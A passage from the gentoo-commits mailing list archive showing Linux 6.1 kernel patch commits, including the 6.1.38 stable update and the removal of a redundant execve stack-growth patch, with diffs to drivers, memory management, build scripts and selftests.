+ static int perf_script__setup_per_event_dump(struct perf_script *script)
+ {
+ 	struct evsel *evsel;
+-	static struct evsel_script es_stdout;
+ 
+ 	if (script->per_event_dump)
+ 		return perf_script__fopen_per_event_dump(script);
+diff --git a/tools/perf/util/dwarf-aux.c b/tools/perf/util/dwarf-aux.c
+index 623527edeac1e..b125eaadcec4d 100644
+--- a/tools/perf/util/dwarf-aux.c
++++ b/tools/perf/util/dwarf-aux.c
+@@ -1081,7 +1081,7 @@ int die_get_varname(Dwarf_Die *vr_die, struct strbuf *buf)
+ 	ret = die_get_typename(vr_die, buf);
+ 	if (ret < 0) {
+ 		pr_debug("Failed to get type, make it unknown.\n");
+-		ret = strbuf_add(buf, " (unknown_type)", 14);
++		ret = strbuf_add(buf, "(unknown_type)", 14);
+ 	}
+ 
+ 	return ret < 0 ? ret : strbuf_addf(buf, "\t%s", dwarf_diename(vr_die));
+diff --git a/tools/testing/selftests/bpf/Makefile b/tools/testing/selftests/bpf/Makefile
+index 0465ddc81f352..3b57fbf8fff4a 100644
+--- a/tools/testing/selftests/bpf/Makefile
++++ b/tools/testing/selftests/bpf/Makefile
+@@ -85,8 +85,7 @@ TEST_GEN_PROGS_EXTENDED = test_sock_addr test_skb_cgroup_id_user \
+ 	test_lirc_mode2_user xdping test_cpp runqslower bench bpf_testmod.ko \
+ 	xskxceiver xdp_redirect_multi xdp_synproxy veristat
+ 
+-TEST_CUSTOM_PROGS = $(OUTPUT)/urandom_read $(OUTPUT)/sign-file
+-TEST_GEN_FILES += liburandom_read.so
++TEST_GEN_FILES += liburandom_read.so urandom_read sign-file
+ 
+ # Emit succinct information message describing current building step
+ # $1 - generic step name (e.g., CC, LINK, etc);
+diff --git a/tools/testing/selftests/bpf/prog_tests/check_mtu.c b/tools/testing/selftests/bpf/prog_tests/check_mtu.c
+index 12f4395f18b37..a756760a45edb 100644
+--- a/tools/testing/selftests/bpf/prog_tests/check_mtu.c
++++ b/tools/testing/selftests/bpf/prog_tests/check_mtu.c
+@@ -183,7 +183,7 @@ cleanup:
+ 
+ void serial_test_check_mtu(void)
+ {
+-	__u32 mtu_lo;
++	int mtu_lo;
+ 
+ 	if (test__start_subtest("bpf_check_mtu XDP-attach"))
+ 		test_check_mtu_xdp_attach();
+diff --git a/tools/testing/selftests/cgroup/test_memcontrol.c b/tools/testing/selftests/cgroup/test_memcontrol.c
+index fe4f9f4302822..5a526a8e7d333 100644
+--- a/tools/testing/selftests/cgroup/test_memcontrol.c
++++ b/tools/testing/selftests/cgroup/test_memcontrol.c
+@@ -284,6 +284,7 @@ static int test_memcg_protection(const char *root, bool min)
+ 	char *children[4] = {NULL};
+ 	const char *attribute = min ? "memory.min" : "memory.low";
+ 	long c[4];
++	long current;
+ 	int i, attempts;
+ 	int fd;
+ 
+@@ -392,7 +393,8 @@ static int test_memcg_protection(const char *root, bool min)
+ 		goto cleanup;
+ 	}
+ 
+-	if (!values_close(cg_read_long(parent[1], "memory.current"), MB(50), 3))
++	current = min ? MB(50) : MB(30);
++	if (!values_close(cg_read_long(parent[1], "memory.current"), current, 3))
+ 		goto cleanup;
+ 
+ 	if (min) {
+diff --git a/tools/testing/selftests/net/rtnetlink.sh b/tools/testing/selftests/net/rtnetlink.sh
+index 275491be3da2f..cafd14b1ed2ab 100755
+--- a/tools/testing/selftests/net/rtnetlink.sh
++++ b/tools/testing/selftests/net/rtnetlink.sh
+@@ -835,6 +835,7 @@ EOF
+ 	fi
+ 
+ 	# clean up any leftovers
++	echo 0 > /sys/bus/netdevsim/del_device
+ 	$probed && rmmod netdevsim
+ 
+ 	if [ $ret -ne 0 ]; then
+diff --git a/tools/testing/selftests/rcutorture/configs/rcu/BUSTED-BOOST.boot b/tools/testing/selftests/rcutorture/configs/rcu/BUSTED-BOOST.boot
+index f57720c52c0f9..84f6bb98ce993 100644
+--- a/tools/testing/selftests/rcutorture/configs/rcu/BUSTED-BOOST.boot
++++ b/tools/testing/selftests/rcutorture/configs/rcu/BUSTED-BOOST.boot
+@@ -5,4 +5,4 @@ rcutree.gp_init_delay=3
+ rcutree.gp_cleanup_delay=3
+ rcutree.kthread_prio=2
+ threadirqs
+-tree.use_softirq=0
++rcutree.use_softirq=0
+diff --git a/tools/testing/selftests/rcutorture/configs/rcu/TREE03.boot b/tools/testing/selftests/rcutorture/configs/rcu/TREE03.boot
+index 64f864f1f361f..8e50bfd4b710d 100644
+--- a/tools/testing/selftests/rcutorture/configs/rcu/TREE03.boot
++++ b/tools/testing/selftests/rcutorture/configs/rcu/TREE03.boot
+@@ -4,4 +4,4 @@ rcutree.gp_init_delay=3
+ rcutree.gp_cleanup_delay=3
+ rcutree.kthread_prio=2
+ threadirqs
+-tree.use_softirq=0
++rcutree.use_softirq=0
+diff --git a/tools/testing/selftests/vDSO/vdso_test_clock_getres.c b/tools/testing/selftests/vDSO/vdso_test_clock_getres.c
+index 15dcee16ff726..38d46a8bf7cba 100644
+--- a/tools/testing/selftests/vDSO/vdso_test_clock_getres.c
++++ b/tools/testing/selftests/vDSO/vdso_test_clock_getres.c
+@@ -84,12 +84,12 @@ static inline int vdso_test_clock(unsigned int clock_id)
+ 
+ int main(int argc, char **argv)
+ {
+-	int ret;
++	int ret = 0;
+ 
+ #if _POSIX_TIMERS > 0
+ 
+ #ifdef CLOCK_REALTIME
+-	ret = vdso_test_clock(CLOCK_REALTIME);
++	ret += vdso_test_clock(CLOCK_REALTIME);
+ #endif
+ 
+ #ifdef CLOCK_BOOTTIME
+diff --git a/tools/testing/selftests/wireguard/netns.sh b/tools/testing/selftests/wireguard/netns.sh
+index 69c7796c7ca92..405ff262ca93d 100755
+--- a/tools/testing/selftests/wireguard/netns.sh
++++ b/tools/testing/selftests/wireguard/netns.sh
+@@ -514,10 +514,32 @@ n2 bash -c 'printf 0 > /proc/sys/net/ipv4/conf/all/rp_filter'
+ n1 ping -W 1 -c 1 192.168.241.2
+ [[ $(n2 wg show wg0 endpoints) == "$pub1	10.0.0.3:1" ]]
+ 
+-ip1 link del veth1
+-ip1 link del veth3
+-ip1 link del wg0
+-ip2 link del wg0
++ip1 link del dev veth3
++ip1 link del dev wg0
++ip2 link del dev wg0
++
++# Make sure persistent keep alives are sent when an adapter comes up
++ip1 link add dev wg0 type wireguard
++n1 wg set wg0 private-key <(echo "$key1") peer "$pub2" endpoint 10.0.0.1:1 persistent-keepalive 1
++read _ _ tx_bytes < <(n1 wg show wg0 transfer)
++[[ $tx_bytes -eq 0 ]]
++ip1 link set dev wg0 up
++read _ _ tx_bytes < <(n1 wg show wg0 transfer)
++[[ $tx_bytes -gt 0 ]]
++ip1 link del dev wg0
++# This should also happen even if the private key is set later
++ip1 link add dev wg0 type wireguard
++n1 wg set wg0 peer "$pub2" endpoint 10.0.0.1:1 persistent-keepalive 1
++read _ _ tx_bytes < <(n1 wg show wg0 transfer)
++[[ $tx_bytes -eq 0 ]]
++ip1 link set dev wg0 up
++read _ _ tx_bytes < <(n1 wg show wg0 transfer)
++[[ $tx_bytes -eq 0 ]]
++n1 wg set wg0 private-key <(echo "$key1")
++read _ _ tx_bytes < <(n1 wg show wg0 transfer)
++[[ $tx_bytes -gt 0 ]]
++ip1 link del dev veth1
++ip1 link del dev wg0
+ 
+ # We test that Netlink/IPC is working properly by doing things that usually cause split responses
+ ip0 link add dev wg0 type wireguard


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-07-05 20:34 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-07-05 20:34 UTC (permalink / raw
  To: gentoo-commits

commit:     1bfb91f619e81be1b7ba059b62cbddf0ce837bf5
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Jul  5 20:33:41 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Jul  5 20:33:41 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=1bfb91f6

Remove redundant patch

Removed:
1800_mm-execve-mark-stack-as-growing-down.patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                     |  4 --
 1800_mm-execve-mark-stack-as-growing-down.patch | 82 -------------------------
 2 files changed, 86 deletions(-)

diff --git a/0000_README b/0000_README
index 6c8d0f22..3b5aa81d 100644
--- a/0000_README
+++ b/0000_README
@@ -207,10 +207,6 @@ Patch:  1700_sparc-address-warray-bound-warnings.patch
 From:		https://github.com/KSPP/linux/issues/109
 Desc:		Address -Warray-bounds warnings 
 
-Patch:  1800_mm-execve-mark-stack-as-growing-down.patch
-From:   https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable-rc.git
-Desc:   execve: always mark stack as growing down during early stack setup
-
 Patch:  2000_BT-Check-key-sizes-only-if-Secure-Simple-Pairing-enabled.patch
 From:   https://lore.kernel.org/linux-bluetooth/20190522070540.48895-1-marcel@holtmann.org/raw
 Desc:   Bluetooth: Check key sizes only when Secure Simple Pairing is enabled. See bug #686758

diff --git a/1800_mm-execve-mark-stack-as-growing-down.patch b/1800_mm-execve-mark-stack-as-growing-down.patch
deleted file mode 100644
index 7c71f7ea..00000000
--- a/1800_mm-execve-mark-stack-as-growing-down.patch
+++ /dev/null
@@ -1,82 +0,0 @@
-From 0140eae44accd0df8071de6487afe0921eb0d7fd Mon Sep 17 00:00:00 2001
-From: Linus Torvalds <torvalds@linux-foundation.org>
-Date: Sun, 2 Jul 2023 23:20:17 -0700
-Subject: execve: always mark stack as growing down during early stack setup
-
-commit f66066bc5136f25e36a2daff4896c768f18c211e upstream.
-
-While our user stacks can grow either down (all common architectures) or
-up (parisc and the ia64 register stack), the initial stack setup when we
-copy the argument and environment strings to the new stack at execve()
-time is always done by extending the stack downwards.
-
-But it turns out that in commit 8d7071af8907 ("mm: always expand the
-stack with the mmap write lock held"), as part of making the stack
-growing code more robust, 'expand_downwards()' was now made to actually
-check the vma flags:
-
-	if (!(vma->vm_flags & VM_GROWSDOWN))
-		return -EFAULT;
-
-and that meant that this execve-time stack expansion started failing on
-parisc, because on that architecture, the stack flags do not contain the
-VM_GROWSDOWN bit.
-
-At the same time the new check in expand_downwards() is clearly correct,
-and simplified the callers, so let's not remove it.
-
-The solution is instead to just codify the fact that yes, during
-execve(), the stack grows down.  This not only matches reality, it ends
-up being particularly simple: we already have special execve-time flags
-for the stack (VM_STACK_INCOMPLETE_SETUP) and use those flags to avoid
-page migration during this setup time (see vma_is_temporary_stack() and
-invalid_migration_vma()).
-
-So just add VM_GROWSDOWN to that set of temporary flags, and now our
-stack flags automatically match reality, and the parisc stack expansion
-works again.
-
-Note that the VM_STACK_INCOMPLETE_SETUP bits will be cleared when the
-stack is finalized, so we only add the extra VM_GROWSDOWN bit on
-CONFIG_STACK_GROWSUP architectures (ie parisc) rather than adding it in
-general.
-
-Link: https://lore.kernel.org/all/612eaa53-6904-6e16-67fc-394f4faa0e16@bell.net/
-Link: https://lore.kernel.org/all/5fd98a09-4792-1433-752d-029ae3545168@gmx.de/
-Fixes: 8d7071af8907 ("mm: always expand the stack with the mmap write lock held")
-Reported-by: John David Anglin <dave.anglin@bell.net>
-Reported-and-tested-by: Helge Deller <deller@gmx.de>
-Reported-and-tested-by: Guenter Roeck <linux@roeck-us.net>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- include/linux/mm.h | 4 +++-
- 1 file changed, 3 insertions(+), 1 deletion(-)
-
-diff --git a/include/linux/mm.h b/include/linux/mm.h
-index f5b6ef943ede2..b8ed44f401b58 100644
---- a/include/linux/mm.h
-+++ b/include/linux/mm.h
-@@ -378,7 +378,7 @@ extern unsigned int kobjsize(const void *objp);
- #endif /* CONFIG_HAVE_ARCH_USERFAULTFD_MINOR */
- 
- /* Bits set in the VMA until the stack is in its final location */
--#define VM_STACK_INCOMPLETE_SETUP	(VM_RAND_READ | VM_SEQ_READ)
-+#define VM_STACK_INCOMPLETE_SETUP (VM_RAND_READ | VM_SEQ_READ | VM_STACK_EARLY)
- 
- #define TASK_EXEC ((current->personality & READ_IMPLIES_EXEC) ? VM_EXEC : 0)
- 
-@@ -400,8 +400,10 @@ extern unsigned int kobjsize(const void *objp);
- 
- #ifdef CONFIG_STACK_GROWSUP
- #define VM_STACK	VM_GROWSUP
-+#define VM_STACK_EARLY	VM_GROWSDOWN
- #else
- #define VM_STACK	VM_GROWSDOWN
-+#define VM_STACK_EARLY	0
- #endif
- 
- #define VM_STACK_FLAGS	(VM_STACK | VM_STACK_DEFAULT_FLAGS | VM_ACCOUNT)
--- 
-cgit 
-


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-07-05 20:28 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-07-05 20:28 UTC (permalink / raw
  To: gentoo-commits

commit:     25387cd201c8d4fe72a2321d30fcdf209f84c544
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Jul  5 20:28:46 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Jul  5 20:28:46 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=25387cd2

Linux patch 6.1.38

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |   4 +
 1037_linux-6.1.38.patch | 367 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 371 insertions(+)

diff --git a/0000_README b/0000_README
index 0d9f0d0b..6c8d0f22 100644
--- a/0000_README
+++ b/0000_README
@@ -191,6 +191,10 @@ Patch:  1036_linux-6.1.37.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.37
 
+Patch:  1037_linux-6.1.38.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.38
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1037_linux-6.1.38.patch b/1037_linux-6.1.38.patch
new file mode 100644
index 00000000..7a5cc22c
--- /dev/null
+++ b/1037_linux-6.1.38.patch
@@ -0,0 +1,367 @@
+diff --git a/Documentation/process/changes.rst b/Documentation/process/changes.rst
+index 9844ca3a71a61..c76b02d940946 100644
+--- a/Documentation/process/changes.rst
++++ b/Documentation/process/changes.rst
+@@ -60,6 +60,7 @@ openssl & libcrypto    1.0.0            openssl version
+ bc                     1.06.95          bc --version
+ Sphinx\ [#f1]_         1.7              sphinx-build --version
+ cpio                   any              cpio --version
++gtags (optional)       6.6.5            gtags --version
+ ====================== ===============  ========================================
+ 
+ .. [#f1] Sphinx is needed only to build the Kernel documentation
+@@ -174,6 +175,12 @@ You will need openssl to build kernels 3.7 and higher if module signing is
+ enabled.  You will also need openssl development packages to build kernels 4.3
+ and higher.
+ 
++gtags / GNU GLOBAL (optional)
++-----------------------------
++
++The kernel build requires GNU GLOBAL version 6.6.5 or later to generate
++tag files through ``make gtags``.  This is due to its use of the gtags
++``-C (--directory)`` flag.
+ 
+ System utilities
+ ****************
+diff --git a/Makefile b/Makefile
+index 26d73ce7e9267..57c891b8b13cc 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 37
++SUBLEVEL = 38
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c
+index 003aa9e47085e..5a8a4cda7e987 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c
+@@ -2363,6 +2363,10 @@ int amdgpu_vm_ioctl(struct drm_device *dev, void *data, struct drm_file *filp)
+ 	long timeout = msecs_to_jiffies(2000);
+ 	int r;
+ 
++	/* No valid flags defined yet */
++	if (args->in.flags)
++		return -EINVAL;
++
+ 	switch (args->in.op) {
+ 	case AMDGPU_VM_OP_RESERVE_VMID:
+ 		/* We only have requirement to reserve vmid from gfxhub */
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc.c b/drivers/gpu/drm/amd/display/dc/core/dc.c
+index af7aefe285ffd..087a4838488b2 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc.c
+@@ -401,8 +401,13 @@ bool dc_stream_adjust_vmin_vmax(struct dc *dc,
+ {
+ 	int i;
+ 
+-	if (memcmp(adjust, &stream->adjust, sizeof(struct dc_crtc_timing_adjust)) == 0)
+-		return true;
++	/*
++	 * Don't adjust DRR while there's bandwidth optimizations pending to
++	 * avoid conflicting with firmware updates.
++	 */
++	if (dc->ctx->dce_version > DCE_VERSION_MAX)
++		if (dc->optimized_required || dc->wm_optimized_required)
++			return false;
+ 
+ 	stream->adjust.v_total_max = adjust->v_total_max;
+ 	stream->adjust.v_total_mid = adjust->v_total_mid;
+@@ -2024,27 +2029,33 @@ void dc_post_update_surfaces_to_stream(struct dc *dc)
+ 
+ 	post_surface_trace(dc);
+ 
+-	if (dc->ctx->dce_version >= DCE_VERSION_MAX)
+-		TRACE_DCN_CLOCK_STATE(&context->bw_ctx.bw.dcn.clk);
+-	else
++	/*
++	 * Only relevant for DCN behavior where we can guarantee the optimization
++	 * is safe to apply - retain the legacy behavior for DCE.
++	 */
++
++	if (dc->ctx->dce_version < DCE_VERSION_MAX)
+ 		TRACE_DCE_CLOCK_STATE(&context->bw_ctx.bw.dce);
++	else {
++		TRACE_DCN_CLOCK_STATE(&context->bw_ctx.bw.dcn.clk);
+ 
+-	if (is_flip_pending_in_pipes(dc, context))
+-		return;
++		if (is_flip_pending_in_pipes(dc, context))
++			return;
+ 
+-	for (i = 0; i < dc->res_pool->pipe_count; i++)
+-		if (context->res_ctx.pipe_ctx[i].stream == NULL ||
+-		    context->res_ctx.pipe_ctx[i].plane_state == NULL) {
+-			context->res_ctx.pipe_ctx[i].pipe_idx = i;
+-			dc->hwss.disable_plane(dc, &context->res_ctx.pipe_ctx[i]);
+-		}
++		for (i = 0; i < dc->res_pool->pipe_count; i++)
++			if (context->res_ctx.pipe_ctx[i].stream == NULL ||
++					context->res_ctx.pipe_ctx[i].plane_state == NULL) {
++				context->res_ctx.pipe_ctx[i].pipe_idx = i;
++				dc->hwss.disable_plane(dc, &context->res_ctx.pipe_ctx[i]);
++			}
+ 
+-	process_deferred_updates(dc);
++		process_deferred_updates(dc);
+ 
+-	dc->hwss.optimize_bandwidth(dc, context);
++		dc->hwss.optimize_bandwidth(dc, context);
+ 
+-	if (dc->debug.enable_double_buffered_dsc_pg_support)
+-		dc->hwss.update_dsc_pg(dc, context, true);
++		if (dc->debug.enable_double_buffered_dsc_pg_support)
++			dc->hwss.update_dsc_pg(dc, context, true);
++	}
+ 
+ 	dc->optimized_required = false;
+ 	dc->wm_optimized_required = false;
+@@ -3869,12 +3880,9 @@ void dc_commit_updates_for_stream(struct dc *dc,
+ 			if (new_pipe->plane_state && new_pipe->plane_state != old_pipe->plane_state)
+ 				new_pipe->plane_state->force_full_update = true;
+ 		}
+-	} else if (update_type == UPDATE_TYPE_FAST && dc_ctx->dce_version >= DCE_VERSION_MAX) {
++	} else if (update_type == UPDATE_TYPE_FAST) {
+ 		/*
+ 		 * Previous frame finished and HW is ready for optimization.
+-		 *
+-		 * Only relevant for DCN behavior where we can guarantee the optimization
+-		 * is safe to apply - retain the legacy behavior for DCE.
+ 		 */
+ 		dc_post_update_surfaces_to_stream(dc);
+ 	}
+diff --git a/drivers/nubus/proc.c b/drivers/nubus/proc.c
+index 1fd667852271f..cd4bd06cf3094 100644
+--- a/drivers/nubus/proc.c
++++ b/drivers/nubus/proc.c
+@@ -137,6 +137,18 @@ static int nubus_proc_rsrc_show(struct seq_file *m, void *v)
+ 	return 0;
+ }
+ 
++static int nubus_rsrc_proc_open(struct inode *inode, struct file *file)
++{
++	return single_open(file, nubus_proc_rsrc_show, inode);
++}
++
++static const struct proc_ops nubus_rsrc_proc_ops = {
++	.proc_open	= nubus_rsrc_proc_open,
++	.proc_read	= seq_read,
++	.proc_lseek	= seq_lseek,
++	.proc_release	= single_release,
++};
++
+ void nubus_proc_add_rsrc_mem(struct proc_dir_entry *procdir,
+ 			     const struct nubus_dirent *ent,
+ 			     unsigned int size)
+@@ -152,8 +164,8 @@ void nubus_proc_add_rsrc_mem(struct proc_dir_entry *procdir,
+ 		pded = nubus_proc_alloc_pde_data(nubus_dirptr(ent), size);
+ 	else
+ 		pded = NULL;
+-	proc_create_single_data(name, S_IFREG | 0444, procdir,
+-			nubus_proc_rsrc_show, pded);
++	proc_create_data(name, S_IFREG | 0444, procdir,
++			 &nubus_rsrc_proc_ops, pded);
+ }
+ 
+ void nubus_proc_add_rsrc(struct proc_dir_entry *procdir,
+@@ -166,9 +178,9 @@ void nubus_proc_add_rsrc(struct proc_dir_entry *procdir,
+ 		return;
+ 
+ 	snprintf(name, sizeof(name), "%x", ent->type);
+-	proc_create_single_data(name, S_IFREG | 0444, procdir,
+-			nubus_proc_rsrc_show,
+-			nubus_proc_alloc_pde_data(data, 0));
++	proc_create_data(name, S_IFREG | 0444, procdir,
++			 &nubus_rsrc_proc_ops,
++			 nubus_proc_alloc_pde_data(data, 0));
+ }
+ 
+ /*
+diff --git a/drivers/pci/pci-acpi.c b/drivers/pci/pci-acpi.c
+index 1698205dd73cb..7aa1c20582ab8 100644
+--- a/drivers/pci/pci-acpi.c
++++ b/drivers/pci/pci-acpi.c
+@@ -1043,6 +1043,16 @@ bool acpi_pci_bridge_d3(struct pci_dev *dev)
+ 	return false;
+ }
+ 
++static void acpi_pci_config_space_access(struct pci_dev *dev, bool enable)
++{
++	int val = enable ? ACPI_REG_CONNECT : ACPI_REG_DISCONNECT;
++	int ret = acpi_evaluate_reg(ACPI_HANDLE(&dev->dev),
++				    ACPI_ADR_SPACE_PCI_CONFIG, val);
++	if (ret)
++		pci_dbg(dev, "ACPI _REG %s evaluation failed (%d)\n",
++			enable ? "connect" : "disconnect", ret);
++}
++
+ int acpi_pci_set_power_state(struct pci_dev *dev, pci_power_t state)
+ {
+ 	struct acpi_device *adev = ACPI_COMPANION(&dev->dev);
+@@ -1053,32 +1063,49 @@ int acpi_pci_set_power_state(struct pci_dev *dev, pci_power_t state)
+ 		[PCI_D3hot] = ACPI_STATE_D3_HOT,
+ 		[PCI_D3cold] = ACPI_STATE_D3_COLD,
+ 	};
+-	int error = -EINVAL;
++	int error;
+ 
+ 	/* If the ACPI device has _EJ0, ignore the device */
+ 	if (!adev || acpi_has_method(adev->handle, "_EJ0"))
+ 		return -ENODEV;
+ 
+ 	switch (state) {
+-	case PCI_D3cold:
+-		if (dev_pm_qos_flags(&dev->dev, PM_QOS_FLAG_NO_POWER_OFF) ==
+-				PM_QOS_FLAGS_ALL) {
+-			error = -EBUSY;
+-			break;
+-		}
+-		fallthrough;
+ 	case PCI_D0:
+ 	case PCI_D1:
+ 	case PCI_D2:
+ 	case PCI_D3hot:
+-		error = acpi_device_set_power(adev, state_conv[state]);
++	case PCI_D3cold:
++		break;
++	default:
++		return -EINVAL;
++	}
++
++	if (state == PCI_D3cold) {
++		if (dev_pm_qos_flags(&dev->dev, PM_QOS_FLAG_NO_POWER_OFF) ==
++				PM_QOS_FLAGS_ALL)
++			return -EBUSY;
++
++		/* Notify AML lack of PCI config space availability */
++		acpi_pci_config_space_access(dev, false);
+ 	}
+ 
+-	if (!error)
+-		pci_dbg(dev, "power state changed by ACPI to %s\n",
+-		        acpi_power_state_string(adev->power.state));
++	error = acpi_device_set_power(adev, state_conv[state]);
++	if (error)
++		return error;
+ 
+-	return error;
++	pci_dbg(dev, "power state changed by ACPI to %s\n",
++	        acpi_power_state_string(adev->power.state));
++
++	/*
++	 * Notify AML of PCI config space availability.  Config space is
++	 * accessible in all states except D3cold; the only transitions
++	 * that change availability are transitions to D3cold and from
++	 * D3cold to D0.
++	 */
++	if (state == PCI_D0)
++		acpi_pci_config_space_access(dev, true);
++
++	return 0;
+ }
+ 
+ pci_power_t acpi_pci_get_power_state(struct pci_dev *dev)
+diff --git a/include/linux/mm.h b/include/linux/mm.h
+index f5b6ef943ede2..b8ed44f401b58 100644
+--- a/include/linux/mm.h
++++ b/include/linux/mm.h
+@@ -378,7 +378,7 @@ extern unsigned int kobjsize(const void *objp);
+ #endif /* CONFIG_HAVE_ARCH_USERFAULTFD_MINOR */
+ 
+ /* Bits set in the VMA until the stack is in its final location */
+-#define VM_STACK_INCOMPLETE_SETUP	(VM_RAND_READ | VM_SEQ_READ)
++#define VM_STACK_INCOMPLETE_SETUP (VM_RAND_READ | VM_SEQ_READ | VM_STACK_EARLY)
+ 
+ #define TASK_EXEC ((current->personality & READ_IMPLIES_EXEC) ? VM_EXEC : 0)
+ 
+@@ -400,8 +400,10 @@ extern unsigned int kobjsize(const void *objp);
+ 
+ #ifdef CONFIG_STACK_GROWSUP
+ #define VM_STACK	VM_GROWSUP
++#define VM_STACK_EARLY	VM_GROWSDOWN
+ #else
+ #define VM_STACK	VM_GROWSDOWN
++#define VM_STACK_EARLY	0
+ #endif
+ 
+ #define VM_STACK_FLAGS	(VM_STACK | VM_STACK_DEFAULT_FLAGS | VM_ACCOUNT)
+diff --git a/mm/nommu.c b/mm/nommu.c
+index da26b3fec9ebe..8e8fe491d914a 100644
+--- a/mm/nommu.c
++++ b/mm/nommu.c
+@@ -688,8 +688,13 @@ EXPORT_SYMBOL(find_vma);
+ struct vm_area_struct *lock_mm_and_find_vma(struct mm_struct *mm,
+ 			unsigned long addr, struct pt_regs *regs)
+ {
++	struct vm_area_struct *vma;
++
+ 	mmap_read_lock(mm);
+-	return vma_lookup(mm, addr);
++	vma = vma_lookup(mm, addr);
++	if (!vma)
++		mmap_read_unlock(mm);
++	return vma;
+ }
+ 
+ /*
+diff --git a/scripts/tags.sh b/scripts/tags.sh
+index 0d045182c08c0..f23b9b7ed0159 100755
+--- a/scripts/tags.sh
++++ b/scripts/tags.sh
+@@ -25,6 +25,13 @@ else
+ 	tree=${srctree}/
+ fi
+ 
++# gtags(1) refuses to index any file outside of its current working dir.
++# If gtags indexing is requested and the build output directory is not
++# the kernel source tree, index all files in absolute-path form.
++if [[ "$1" == "gtags" && -n "${tree}" ]]; then
++	tree=$(realpath "$tree")/
++fi
++
+ # Detect if ALLSOURCE_ARCHS is set. If not, we assume SRCARCH
+ if [ "${ALLSOURCE_ARCHS}" = "" ]; then
+ 	ALLSOURCE_ARCHS=${SRCARCH}
+@@ -124,7 +131,7 @@ docscope()
+ 
+ dogtags()
+ {
+-	all_target_sources | gtags -i -f -
++	all_target_sources | gtags -i -C "${tree:-.}" -f - "$PWD"
+ }
+ 
+ # Basic regular expressions with an optional /kind-spec/ for ctags and
+diff --git a/tools/perf/util/symbol.c b/tools/perf/util/symbol.c
+index a3a165ae933ad..98014f9375686 100644
+--- a/tools/perf/util/symbol.c
++++ b/tools/perf/util/symbol.c
+@@ -1368,10 +1368,23 @@ static int dso__load_kcore(struct dso *dso, struct map *map,
+ 
+ 	/* Find the kernel map using the '_stext' symbol */
+ 	if (!kallsyms__get_function_start(kallsyms_filename, "_stext", &stext)) {
++		u64 replacement_size = 0;
++
+ 		list_for_each_entry(new_map, &md.maps, node) {
+-			if (stext >= new_map->start && stext < new_map->end) {
++			u64 new_size = new_map->end - new_map->start;
++
++			if (!(stext >= new_map->start && stext < new_map->end))
++				continue;
++
++			/*
++			 * On some architectures, ARM64 for example, the kernel
++			 * text can get allocated inside of the vmalloc segment.
++			 * Select the smallest matching segment, in case stext
++			 * falls within more than one in the list.
++			 */
++			if (!replacement_map || new_size < replacement_size) {
+ 				replacement_map = new_map;
+-				break;
++				replacement_size = new_size;
+ 			}
+ 		}
+ 	}


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-07-04 13:15 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-07-04 13:15 UTC (permalink / raw
  To: gentoo-commits

commit:     603da5b7208c6a4e92fdc62538021f1c3d5c7539
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Tue Jul  4 13:15:15 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Tue Jul  4 13:15:15 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=603da5b7

mm: disable CONFIG_PER_VMA_LOCK by default until its fixed

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                     |  4 ++
 1800_mm-execve-mark-stack-as-growing-down.patch | 82 +++++++++++++++++++++++++
 2 files changed, 86 insertions(+)

diff --git a/0000_README b/0000_README
index d50ba74b..0d9f0d0b 100644
--- a/0000_README
+++ b/0000_README
@@ -203,6 +203,10 @@ Patch:  1700_sparc-address-warray-bound-warnings.patch
 From:		https://github.com/KSPP/linux/issues/109
 Desc:		Address -Warray-bounds warnings 
 
+Patch:  1800_mm-execve-mark-stack-as-growing-down.patch
+From:   https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable-rc.git
+Desc:   execve: always mark stack as growing down during early stack setup
+
 Patch:  2000_BT-Check-key-sizes-only-if-Secure-Simple-Pairing-enabled.patch
 From:   https://lore.kernel.org/linux-bluetooth/20190522070540.48895-1-marcel@holtmann.org/raw
